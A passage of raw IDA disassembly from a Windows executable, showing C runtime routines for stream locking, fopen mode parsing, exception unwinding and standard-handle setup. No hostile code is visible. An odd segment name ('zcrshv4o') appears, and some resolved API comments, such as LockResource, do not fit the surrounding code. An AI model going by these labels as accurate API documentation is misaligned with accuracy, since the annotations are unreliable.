		jb	short loc_408791
		cmp	eax, offset dword_424BB0
		ja	short loc_408791
		sub	eax, ecx
		sar	eax, 5
		add	eax, 10h
		push	eax
		call	sub_405EDF
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_408791:				; CODE XREF: sub_40876D+Bj
					; sub_40876D+12j
		add	eax, 20h
		push	eax
		call	ds:dword_41E168	; RtlLeaveCriticalSection
		retn
sub_40876D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40879C	proc near		; CODE XREF: sub_408A61+7Dp
					; sub_4092E0+9p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		cmp	eax, 14h
		jge	short loc_4087B0
		add	eax, 10h
		push	eax
		call	sub_405EDF
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_4087B0:				; CODE XREF: sub_40879C+7j
		mov	eax, [esp+arg_4]
		add	eax, 20h
		push	eax
		call	ds:dword_41E168	; RtlLeaveCriticalSection
		retn
sub_40879C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4087BF	proc near		; CODE XREF: sub_4036BE+9Ap

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_428FA4
		push	ebx
		xor	ebx, ebx
		push	esi
		mov	esi, [ebp+arg_4]
		mov	[ebp+var_4], eax
		mov	[ebp+var_C], ebx
		mov	[ebp+var_8], ebx
		mov	[ebp+var_10], ebx
		jmp	short loc_4087E0
; ---------------------------------------------------------------------------

loc_4087DF:				; CODE XREF: sub_4087BF+24j
		inc	esi

loc_4087E0:				; CODE XREF: sub_4087BF+1Ej
		cmp	byte ptr [esi],	20h
		jz	short loc_4087DF
		mov	al, [esi]
		cmp	al, 61h
		jz	short loc_408824
		cmp	al, 72h
		jz	short loc_40881B
		cmp	al, 77h
		jz	short loc_408812
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		xor	eax, eax
		jmp	loc_408A5D
; ---------------------------------------------------------------------------

loc_408812:				; CODE XREF: sub_4087BF+32j
		mov	[ebp+arg_4], 301h
		jmp	short loc_40882B
; ---------------------------------------------------------------------------

loc_40881B:				; CODE XREF: sub_4087BF+2Ej
		or	[ebp+var_4], 1
		mov	[ebp+arg_4], ebx
		jmp	short loc_40882F
; ---------------------------------------------------------------------------

loc_408824:				; CODE XREF: sub_4087BF+2Aj
		mov	[ebp+arg_4], 109h

loc_40882B:				; CODE XREF: sub_4087BF+5Aj
		or	[ebp+var_4], 2

loc_40882F:				; CODE XREF: sub_4087BF+63j
		xor	ecx, ecx
		inc	ecx
		inc	esi
		mov	al, [esi]
		cmp	al, bl
		push	edi
		jz	loc_4089F7
		mov	edx, 80h
		mov	edi, 4000h

loc_408848:				; CODE XREF: sub_4087BF+1B6j
		cmp	ecx, ebx
		jz	loc_40897B
		movsx	eax, al
		cmp	eax, 53h
		jg	loc_4088FE
		jz	loc_4088EC
		sub	eax, 20h
		jz	loc_408970
		sub	eax, 0Bh
		jz	short loc_4088C6
		dec	eax
		jz	short loc_4088BA
		sub	eax, 18h
		jz	short loc_4088A7
		sub	eax, 0Ah
		jz	short loc_40889F
		sub	eax, 4
		jnz	loc_408A00
		cmp	[ebp+var_8], ebx
		jnz	loc_408965
		or	[ebp+arg_4], 10h
		mov	[ebp+var_8], 1
		jmp	loc_408970
; ---------------------------------------------------------------------------

loc_40889F:				; CODE XREF: sub_4087BF+BCj
		or	[ebp+arg_4], edx
		jmp	loc_408970
; ---------------------------------------------------------------------------

loc_4088A7:				; CODE XREF: sub_4087BF+B7j
		test	byte ptr [ebp+arg_4], 40h
		jnz	loc_408965
		or	[ebp+arg_4], 40h
		jmp	loc_408970
; ---------------------------------------------------------------------------

loc_4088BA:				; CODE XREF: sub_4087BF+B2j
		mov	[ebp+var_10], 1
		jmp	loc_408965
; ---------------------------------------------------------------------------

loc_4088C6:				; CODE XREF: sub_4087BF+AFj
		test	byte ptr [ebp+arg_4], 2
		jnz	loc_408965
		mov	eax, [ebp+arg_4]
		and	eax, 0FFFFFFFEh
		or	eax, 2
		mov	[ebp+arg_4], eax
		mov	eax, [ebp+var_4]
		and	eax, 0FFFFFFFCh
		or	eax, edx
		mov	[ebp+var_4], eax
		jmp	loc_408970
; ---------------------------------------------------------------------------

loc_4088EC:				; CODE XREF: sub_4087BF+9Dj
		cmp	[ebp+var_8], ebx
		jnz	short loc_408965
		or	[ebp+arg_4], 20h
		mov	[ebp+var_8], 1
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_4088FE:				; CODE XREF: sub_4087BF+97j
		sub	eax, 54h
		jz	short loc_40895D
		sub	eax, 0Eh
		jz	short loc_40894C
		dec	eax
		jz	short loc_40893B
		sub	eax, 0Bh
		jz	short loc_408926
		sub	eax, 6
		jnz	loc_408A00
		test	word ptr [ebp+arg_4], 0C000h
		jnz	short loc_408965
		or	[ebp+arg_4], edi
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_408926:				; CODE XREF: sub_4087BF+14Fj
		cmp	[ebp+var_C], ebx
		jnz	short loc_408965
		and	[ebp+var_4], 0FFFFBFFFh
		mov	[ebp+var_C], 1
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_40893B:				; CODE XREF: sub_4087BF+14Aj
		cmp	[ebp+var_C], ebx
		jnz	short loc_408965
		or	[ebp+var_4], edi
		mov	[ebp+var_C], 1
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_40894C:				; CODE XREF: sub_4087BF+147j
		test	word ptr [ebp+arg_4], 0C000h
		jnz	short loc_408965
		or	[ebp+arg_4], 8000h
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_40895D:				; CODE XREF: sub_4087BF+142j
		test	word ptr [ebp+arg_4], 1000h
		jz	short loc_408969

loc_408965:				; CODE XREF: sub_4087BF+CAj
					; sub_4087BF+ECj ...
		xor	ecx, ecx
		jmp	short loc_408970
; ---------------------------------------------------------------------------

loc_408969:				; CODE XREF: sub_4087BF+1A4j
		or	[ebp+arg_4], 1000h

loc_408970:				; CODE XREF: sub_4087BF+A6j
					; sub_4087BF+DBj ...
		inc	esi
		mov	al, [esi]
		cmp	al, bl
		jnz	loc_408848

loc_40897B:				; CODE XREF: sub_4087BF+8Bj
		cmp	[ebp+var_10], ebx
		jz	short loc_4089F7
		jmp	short loc_408983
; ---------------------------------------------------------------------------

loc_408982:				; CODE XREF: sub_4087BF+1C7j
		inc	esi

loc_408983:				; CODE XREF: sub_4087BF+1C1j
		cmp	byte ptr [esi],	20h
		jz	short loc_408982
		push	4
		push	esi
		push	offset aCcs	; "ccs="
		call	sub_40F0F0
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_408A00
		add	esi, 4
		push	offset aUtf8	; "UTF-8"
		push	esi
		call	sub_40EF74
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_4089BC
		add	esi, 5
		or	[ebp+arg_4], 40000h
		jmp	short loc_4089F7
; ---------------------------------------------------------------------------

loc_4089BC:				; CODE XREF: sub_4087BF+1EFj
		push	offset aUtf16le	; "UTF-16LE"
		push	esi
		call	sub_40EF74
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_4089D9
		add	esi, 8
		or	[ebp+arg_4], 20000h
		jmp	short loc_4089F7
; ---------------------------------------------------------------------------

loc_4089D9:				; CODE XREF: sub_4087BF+20Cj
		push	offset aUnicode	; "UNICODE"
		push	esi
		call	sub_40EF74
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_408A00
		add	esi, 7
		or	[ebp+arg_4], 10000h
		jmp	short loc_4089F7
; ---------------------------------------------------------------------------

loc_4089F6:				; CODE XREF: sub_4087BF+23Bj
		inc	esi

loc_4089F7:				; CODE XREF: sub_4087BF+79j
					; sub_4087BF+1BFj ...
		cmp	byte ptr [esi],	20h
		jz	short loc_4089F6
		cmp	[esi], bl
		jz	short loc_408A1A

loc_408A00:				; CODE XREF: sub_4087BF+C1j
					; sub_4087BF+154j ...
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_408A38
; ---------------------------------------------------------------------------

loc_408A1A:				; CODE XREF: sub_4087BF+23Fj
		push	180h
		push	[ebp+arg_8]
		lea	eax, [ebp+var_10]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		push	eax
		call	sub_40ED3C
		add	esp, 14h
		test	eax, eax
		jz	short loc_408A3C

loc_408A38:				; CODE XREF: sub_4087BF+259j
		xor	eax, eax
		jmp	short loc_408A5C
; ---------------------------------------------------------------------------

loc_408A3C:				; CODE XREF: sub_4087BF+277j
		mov	eax, [ebp+arg_C]
		inc	dword_428AE8
		mov	ecx, [ebp+var_4]
		mov	[eax+0Ch], ecx
		mov	ecx, [ebp+var_10]
		mov	[eax+4], ebx
		mov	[eax], ebx
		mov	[eax+8], ebx
		mov	[eax+1Ch], ebx
		mov	[eax+10h], ecx

loc_408A5C:				; CODE XREF: sub_4087BF+27Bj
		pop	edi

loc_408A5D:				; CODE XREF: sub_4087BF+4Ej
		pop	esi
		pop	ebx
		leave
		retn
sub_4087BF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408A61	proc near		; CODE XREF: sub_4036BE+54p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	10h
		push	offset dword_422A88
		call	__SEH_prolog4
		xor	ebx, ebx
		xor	edi, edi
		mov	[ebp+var_1C], edi
		push	1
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		xor	esi, esi

loc_408A81:				; CODE XREF: sub_408A61+85j
		mov	[ebp+var_20], esi
		cmp	esi, dword_438FE0
		jge	loc_408B51
		mov	eax, dword_437FC0
		lea	eax, [eax+esi*4]
		cmp	[eax], ebx
		jz	short loc_408AEC
		mov	eax, [eax]
		test	byte ptr [eax+0Ch], 83h
		jnz	short loc_408AE5
		lea	eax, [esi-3]
		cmp	eax, 10h
		ja	short loc_408ABE
		lea	eax, [esi+10h]
		push	eax
		call	sub_405EF4
		pop	ecx
		test	eax, eax
		jz	loc_408B51

loc_408ABE:				; CODE XREF: sub_408A61+49j
		mov	eax, dword_437FC0
		push	dword ptr [eax+esi*4]
		push	esi
		call	sub_40874A
		pop	ecx
		pop	ecx
		mov	eax, dword_437FC0
		mov	eax, [eax+esi*4]
		test	byte ptr [eax+0Ch], 83h
		jz	short loc_408AE8
		push	eax
		push	esi
		call	sub_40879C
		pop	ecx
		pop	ecx

loc_408AE5:				; CODE XREF: sub_408A61+41j
		inc	esi
		jmp	short loc_408A81
; ---------------------------------------------------------------------------

loc_408AE8:				; CODE XREF: sub_408A61+79j
		mov	edi, eax
		jmp	short loc_408B4E
; ---------------------------------------------------------------------------

loc_408AEC:				; CODE XREF: sub_408A61+39j
		shl	esi, 2
		push	38h
		call	sub_407CFA
		pop	ecx
		mov	ecx, dword_437FC0
		mov	[esi+ecx], eax
		mov	eax, dword_437FC0
		add	eax, esi
		cmp	[eax], ebx
		jz	short loc_408B51
		push	0FA0h
		mov	eax, [eax]
		add	eax, 20h
		push	eax
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		mov	eax, dword_437FC0
		jnz	short loc_408B39
		push	dword ptr [esi+eax]
		call	sub_403B91
		pop	ecx
		mov	eax, dword_437FC0
		mov	[esi+eax], ebx
		jmp	short loc_408B51
; ---------------------------------------------------------------------------

loc_408B39:				; CODE XREF: sub_408A61+C3j
		mov	eax, [esi+eax]
		add	eax, 20h
		push	eax
		call	ds:dword_41E164	; RtlEnterCriticalSection
		mov	eax, dword_437FC0
		mov	edi, [esi+eax]

loc_408B4E:				; CODE XREF: sub_408A61+89j
		mov	[ebp+var_1C], edi

loc_408B51:				; CODE XREF: sub_408A61+29j
					; sub_408A61+57j ...
		cmp	edi, ebx
		jz	short loc_408B67
		mov	[edi+4], ebx
		mov	[edi+0Ch], ebx
		mov	[edi+8], ebx
		mov	[edi], ebx
		mov	[edi+1Ch], ebx
		or	dword ptr [edi+10h], 0FFFFFFFFh

loc_408B67:				; CODE XREF: sub_408A61+F2j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_408B7E
		mov	eax, edi
		call	__SEH_epilog4
		retn
sub_408A61	endp


; =============== S U B	R O U T	I N E =======================================



sub_408B7B	proc near		; DATA XREF: zcrshv4o:00422AA0o
		mov	edi, [ebp-1Ch]
sub_408B7B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_408B7E	proc near		; CODE XREF: sub_408A61+10Dp
		push	1
		call	sub_405EDF
		pop	ecx
		retn
sub_408B7E	endp

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_408B88	proc near		; CODE XREF: sub_4036BE+8Ap
					; sub_408B88+BDp ...

var_20		= dword	ptr -20h
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	ebx
		push	esi
		push	edi
		mov	edx, [esp+0Ch+arg_0]
		mov	eax, [esp+0Ch+arg_4]
		mov	ecx, [esp+0Ch+arg_8]
		push	ebp
		push	edx
		push	eax
		push	ecx
		push	ecx
		push	offset loc_408C18
		push	large dword ptr	fs:0
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+28h+var_20], eax
		mov	large fs:0, esp

loc_408BBA:				; CODE XREF: sub_408B88+64j
					; sub_408B88+80j
		mov	eax, [esp+28h+arg_4]
		mov	ebx, [eax+8]
		mov	ecx, [esp+28h+arg_0]
		xor	ebx, [ecx]
		mov	esi, [eax+0Ch]
		cmp	esi, 0FFFFFFFEh
		jz	short loc_408C0A
		mov	edx, [esp+28h+arg_8]
		cmp	edx, 0FFFFFFFEh
		jz	short loc_408BDC
		cmp	esi, edx
		jbe	short loc_408C0A

loc_408BDC:				; CODE XREF: sub_408B88+4Ej
		lea	esi, [esi+esi*2]
		lea	ebx, [ebx+esi*4+10h]
		mov	ecx, [ebx]
		mov	[eax+0Ch], ecx
		cmp	dword ptr [ebx+4], 0
		jnz	short loc_408BBA
		push	101h
		mov	eax, [ebx+8]
		call	sub_40F21D
		mov	ecx, 1
		mov	eax, [ebx+8]
		call	sub_40F23C
		jmp	short loc_408BBA
; ---------------------------------------------------------------------------

loc_408C0A:				; CODE XREF: sub_408B88+45j
					; sub_408B88+52j
		pop	large dword ptr	fs:0
		add	esp, 18h
		pop	edi
		pop	esi
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_408C18:				; DATA XREF: sub_408B88+14o
		mov	ecx, [esp+arg_0]
		test	dword ptr [ecx+4], 6
		mov	eax, 1
		jz	short locret_408C5D
		mov	eax, [esp+arg_4]
		mov	ecx, [eax+8]
		xor	ecx, eax
		call	sub_402C9E
		push	ebp
		mov	ebp, [eax+18h]
		push	dword ptr [eax+0Ch]
		push	dword ptr [eax+10h]
		push	dword ptr [eax+14h]
		call	sub_408B88
		add	esp, 0Ch
		pop	ebp
		mov	eax, [esp+arg_4]
		mov	edx, [esp+arg_C]
		mov	[edx], eax
		mov	eax, 3

locret_408C5D:				; CODE XREF: sub_408B88+A0j
		retn
sub_408B88	endp

; ---------------------------------------------------------------------------
		push	ebp
		mov	ecx, [esp+8]
		mov	ebp, [ecx]
		push	dword ptr [ecx+1Ch]
		push	dword ptr [ecx+18h]
		push	dword ptr [ecx+28h]
		call	sub_408B88
		add	esp, 0Ch
		pop	ebp
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_408C7A	proc near		; CODE XREF: sub_406C00+89p
		push	ebp
		push	esi
		push	edi
		push	ebx
		mov	ebp, edx
		xor	eax, eax
		xor	ebx, ebx
		xor	edx, edx
		xor	esi, esi
		xor	edi, edi
		call	ecx
		pop	ebx
		pop	edi
		pop	esi
		pop	ebp
		retn
sub_408C7A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_406C00

loc_408C91:				; CODE XREF: sub_406C00+170j
		mov	ebp, edx
		mov	esi, ecx
		mov	eax, ecx
		push	1
		call	sub_40F21D
		xor	eax, eax
		xor	ebx, ebx
		xor	ecx, ecx
		xor	edx, edx
		xor	edi, edi
		jmp	esi
; END OF FUNCTION CHUNK	FOR sub_406C00

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408CAA	proc near		; CODE XREF: sub_406C00+11Fp
		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		push	edi
		push	0
		push	0
		push	offset loc_408CBF
		push	ecx
		call	sub_413F36

loc_408CBF:				; DATA XREF: sub_408CAA+Ao
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_408CAA	endp


; =============== S U B	R O U T	I N E =======================================



sub_408CC4	proc near		; CODE XREF: sub_406C00+137p
					; sub_406C00+18Cp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebp
		mov	ebp, [esp+4+arg_0]
		push	edx
		push	ecx
		push	[esp+0Ch+arg_4]
		call	sub_408B88
		add	esp, 0Ch
		pop	ebp
		retn	8
sub_408CC4	endp


; =============== S U B	R O U T	I N E =======================================



sub_408CDB	proc near		; CODE XREF: sub_403795+10Ep

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	esi
		call	sub_408FE0
		push	eax
		call	sub_40DB00
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_408D6D
		call	sub_408644
		add	eax, 20h
		cmp	esi, eax
		jnz	short loc_408D02
		xor	eax, eax
		jmp	short loc_408D11
; ---------------------------------------------------------------------------

loc_408D02:				; CODE XREF: sub_408CDB+21j
		call	sub_408644
		add	eax, 40h
		cmp	esi, eax
		jnz	short loc_408D6D
		xor	eax, eax
		inc	eax

loc_408D11:				; CODE XREF: sub_408CDB+25j
		inc	dword_428AE8
		test	word ptr [esi+0Ch], 10Ch
		jnz	short loc_408D6D
		push	ebx
		push	edi
		lea	edi, ds:428AECh[eax*4]
		cmp	dword ptr [edi], 0
		mov	ebx, 1000h
		jnz	short loc_408D52
		push	ebx
		call	sub_407CFA
		test	eax, eax
		pop	ecx
		mov	[edi], eax
		jnz	short loc_408D52
		lea	eax, [esi+14h]
		push	2
		mov	[esi+8], eax
		mov	[esi], eax
		pop	eax
		mov	[esi+18h], eax
		mov	[esi+4], eax
		jmp	short loc_408D5F
; ---------------------------------------------------------------------------

loc_408D52:				; CODE XREF: sub_408CDB+55j
					; sub_408CDB+62j
		mov	edi, [edi]
		mov	[esi+8], edi
		mov	[esi], edi
		mov	[esi+18h], ebx
		mov	[esi+4], ebx

loc_408D5F:				; CODE XREF: sub_408CDB+75j
		or	dword ptr [esi+0Ch], 1102h
		pop	edi
		xor	eax, eax
		pop	ebx
		inc	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_408D6D:				; CODE XREF: sub_408CDB+15j
					; sub_408CDB+31j ...
		xor	eax, eax
		pop	esi
		retn
sub_408CDB	endp


; =============== S U B	R O U T	I N E =======================================



sub_408D71	proc near		; CODE XREF: sub_403795+128p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		cmp	[esp+arg_0], 0
		jz	short locret_408D9F
		push	esi
		mov	esi, [esp+4+arg_4]
		test	word ptr [esi+0Ch], 1000h
		jz	short loc_408D9E
		push	esi
		call	sub_40919A
		and	dword ptr [esi+0Ch], 0FFFFEEFFh
		and	dword ptr [esi+18h], 0
		and	dword ptr [esi], 0
		and	dword ptr [esi+8], 0
		pop	ecx

loc_408D9E:				; CODE XREF: sub_408D71+12j
		pop	esi

locret_408D9F:				; CODE XREF: sub_408D71+5j
		retn
sub_408D71	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_408DA0	proc near		; CODE XREF: .text:004045FEp

var_64		= byte ptr -64h
var_32		= word ptr -32h
var_30		= dword	ptr -30h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	54h
		push	offset dword_422AA8
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+ms_exc.disabled], edi
		lea	eax, [ebp+var_64]
		push	eax
		call	ds:off_41E1A8
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		push	28h
		push	20h
		pop	esi
		push	esi
		call	sub_407D3A
		pop	ecx
		pop	ecx
		cmp	eax, edi
		jz	loc_408FD7
		mov	dword_437EC0, eax
		mov	dword_437EA4, esi
		lea	ecx, [eax+500h]
		jmp	short loc_408E13
; ---------------------------------------------------------------------------

loc_408DEA:				; CODE XREF: sub_408DA0+75j
		mov	byte ptr [eax+4], 0
		or	dword ptr [eax], 0FFFFFFFFh
		mov	byte ptr [eax+5], 0Ah
		mov	[eax+8], edi
		mov	byte ptr [eax+24h], 0
		mov	byte ptr [eax+25h], 0Ah
		mov	byte ptr [eax+26h], 0Ah
		add	eax, 28h
		mov	ecx, dword_437EC0
		add	ecx, 500h

loc_408E13:				; CODE XREF: sub_408DA0+48j
		cmp	eax, ecx
		jb	short loc_408DEA
		cmp	[ebp+var_32], di
		jz	loc_408F1E
		mov	eax, [ebp+var_30]
		cmp	eax, edi
		jz	loc_408F1E
		mov	edi, [eax]
		lea	ebx, [eax+4]
		lea	eax, [ebx+edi]
		mov	[ebp+var_1C], eax
		mov	eax, 800h
		cmp	edi, eax
		jl	short loc_408E42
		mov	edi, eax

loc_408E42:				; CODE XREF: sub_408DA0+9Ej
		xor	esi, esi
		inc	esi
		jmp	short loc_408E99
; ---------------------------------------------------------------------------

loc_408E47:				; CODE XREF: sub_408DA0+FFj
		push	28h
		push	20h
		call	sub_407D3A
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_408EA3
		lea	ecx, ds:437EC0h[esi*4]
		mov	[ecx], eax
		add	dword_437EA4, 20h
		lea	edx, [eax+500h]
		jmp	short loc_408E94
; ---------------------------------------------------------------------------

loc_408E6E:				; CODE XREF: sub_408DA0+F6j
		mov	byte ptr [eax+4], 0
		or	dword ptr [eax], 0FFFFFFFFh
		mov	byte ptr [eax+5], 0Ah
		and	dword ptr [eax+8], 0
		and	byte ptr [eax+24h], 80h
		mov	byte ptr [eax+25h], 0Ah
		mov	byte ptr [eax+26h], 0Ah
		add	eax, 28h
		mov	edx, [ecx]
		add	edx, 500h

loc_408E94:				; CODE XREF: sub_408DA0+CCj
		cmp	eax, edx
		jb	short loc_408E6E
		inc	esi

loc_408E99:				; CODE XREF: sub_408DA0+A5j
		cmp	dword_437EA4, edi
		jl	short loc_408E47
		jmp	short loc_408EA9
; ---------------------------------------------------------------------------

loc_408EA3:				; CODE XREF: sub_408DA0+B4j
		mov	edi, dword_437EA4

loc_408EA9:				; CODE XREF: sub_408DA0+101j
		and	[ebp+var_20], 0
		test	edi, edi
		jle	short loc_408F1E

loc_408EB1:				; CODE XREF: sub_408DA0+17Cj
		mov	eax, [ebp+var_1C]
		mov	ecx, [eax]
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_408F11
		cmp	ecx, 0FFFFFFFEh
		jz	short loc_408F11
		mov	al, [ebx]
		test	al, 1
		jz	short loc_408F11
		test	al, 8
		jnz	short loc_408ED5
		push	ecx
		call	ds:dword_41E144	; GetFileType
		test	eax, eax
		jz	short loc_408F11

loc_408ED5:				; CODE XREF: sub_408DA0+128j
		mov	esi, [ebp+var_20]
		mov	eax, esi
		sar	eax, 5
		and	esi, 1Fh
		imul	esi, 28h
		add	esi, dword_437EC0[eax*4]
		mov	eax, [ebp+var_1C]
		mov	eax, [eax]
		mov	[esi], eax
		mov	al, [ebx]
		mov	[esi+4], al
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	loc_408FD7
		inc	dword ptr [esi+8]

loc_408F11:				; CODE XREF: sub_408DA0+119j
					; sub_408DA0+11Ej ...
		inc	[ebp+var_20]
		inc	ebx
		add	[ebp+var_1C], 4
		cmp	[ebp+var_20], edi
		jl	short loc_408EB1

loc_408F1E:				; CODE XREF: sub_408DA0+7Bj
					; sub_408DA0+86j ...
		xor	ebx, ebx

loc_408F20:				; CODE XREF: sub_408DA0+213j
		mov	esi, ebx
		imul	esi, 28h
		add	esi, dword_437EC0
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_408F3D
		cmp	eax, 0FFFFFFFEh
		jz	short loc_408F3D
		or	byte ptr [esi+4], 80h
		jmp	short loc_408FAF
; ---------------------------------------------------------------------------

loc_408F3D:				; CODE XREF: sub_408DA0+190j
					; sub_408DA0+195j
		mov	byte ptr [esi+4], 81h
		test	ebx, ebx
		jnz	short loc_408F4A
		push	0FFFFFFF6h
		pop	eax
		jmp	short loc_408F54
; ---------------------------------------------------------------------------

loc_408F4A:				; CODE XREF: sub_408DA0+1A3j
		mov	eax, ebx
		dec	eax
		neg	eax
		sbb	eax, eax
		add	eax, 0FFFFFFF5h

loc_408F54:				; CODE XREF: sub_408DA0+1A8j
		push	eax
		call	ds:dword_41E148	; GetStdHandle
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jz	short loc_408FA5
		test	edi, edi
		jz	short loc_408FA5
		push	edi
		call	ds:dword_41E144	; GetFileType
		test	eax, eax
		jz	short loc_408FA5
		mov	[esi], edi
		and	eax, 0FFh
		cmp	eax, 2
		jnz	short loc_408F83
		or	byte ptr [esi+4], 40h
		jmp	short loc_408F8C
; ---------------------------------------------------------------------------

loc_408F83:				; CODE XREF: sub_408DA0+1DBj
		cmp	eax, 3
		jnz	short loc_408F8C
		or	byte ptr [esi+4], 8

loc_408F8C:				; CODE XREF: sub_408DA0+1E1j
					; sub_408DA0+1E6j
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		jz	short loc_408FD7
		inc	dword ptr [esi+8]
		jmp	short loc_408FAF
; ---------------------------------------------------------------------------

loc_408FA5:				; CODE XREF: sub_408DA0+1C0j
					; sub_408DA0+1C4j ...
		or	byte ptr [esi+4], 40h
		mov	dword ptr [esi], 0FFFFFFFEh

loc_408FAF:				; CODE XREF: sub_408DA0+19Bj
					; sub_408DA0+203j
		inc	ebx
		cmp	ebx, 3
		jl	loc_408F20
		push	dword_437EA4
		call	ds:dword_41E14C	; LockResource
		xor	eax, eax
		jmp	short loc_408FDA
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_408FD7:				; CODE XREF: sub_408DA0+31j
					; sub_408DA0+168j ...
		or	eax, 0FFFFFFFFh

loc_408FDA:				; CODE XREF: sub_408DA0+227j
		call	__SEH_epilog4
		retn
sub_408DA0	endp


; =============== S U B	R O U T	I N E =======================================



sub_408FE0	proc near		; CODE XREF: sub_403795+63p
					; sub_403795+6Fp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_409008
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_409008:				; CODE XREF: sub_408FE0+9j
		mov	eax, [eax+10h]
		pop	esi
		retn
sub_408FE0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40900D	proc near		; CODE XREF: sub_4090A1+94p
					; sub_40E632+340p ...

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi
		push	esi
		call	sub_40F33D
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_40906C
		cmp	esi, 1
		mov	eax, dword_437EC0
		jnz	short loc_40902F
		test	byte ptr [eax+54h], 1
		jnz	short loc_40903A

loc_40902F:				; CODE XREF: sub_40900D+1Aj
		cmp	esi, 2
		jnz	short loc_409050
		test	byte ptr [eax+2Ch], 1
		jz	short loc_409050

loc_40903A:				; CODE XREF: sub_40900D+20j
		push	2
		call	sub_40F33D
		push	1
		mov	edi, eax
		call	sub_40F33D
		cmp	eax, edi
		pop	ecx
		pop	ecx
		jz	short loc_40906C

loc_409050:				; CODE XREF: sub_40900D+25j
					; sub_40900D+2Bj
		push	esi
		call	sub_40F33D
		pop	ecx
		push	eax
		call	ds:off_41E0D8
		test	eax, eax
		jnz	short loc_40906C
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		mov	edi, eax
		jmp	short loc_40906E
; ---------------------------------------------------------------------------

loc_40906C:				; CODE XREF: sub_40900D+10j
					; sub_40900D+41j ...
		xor	edi, edi

loc_40906E:				; CODE XREF: sub_40900D+5Dj
		push	esi
		call	sub_40F2BC
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		test	edi, edi
		mov	eax, dword_437EC0[eax*4]
		pop	ecx
		mov	byte ptr [eax+esi+4], 0
		jz	short loc_40909C
		push	edi
		call	sub_405DB9
		pop	ecx
		or	eax, 0FFFFFFFFh
		jmp	short loc_40909E
; ---------------------------------------------------------------------------

loc_40909C:				; CODE XREF: sub_40900D+81j
		xor	eax, eax

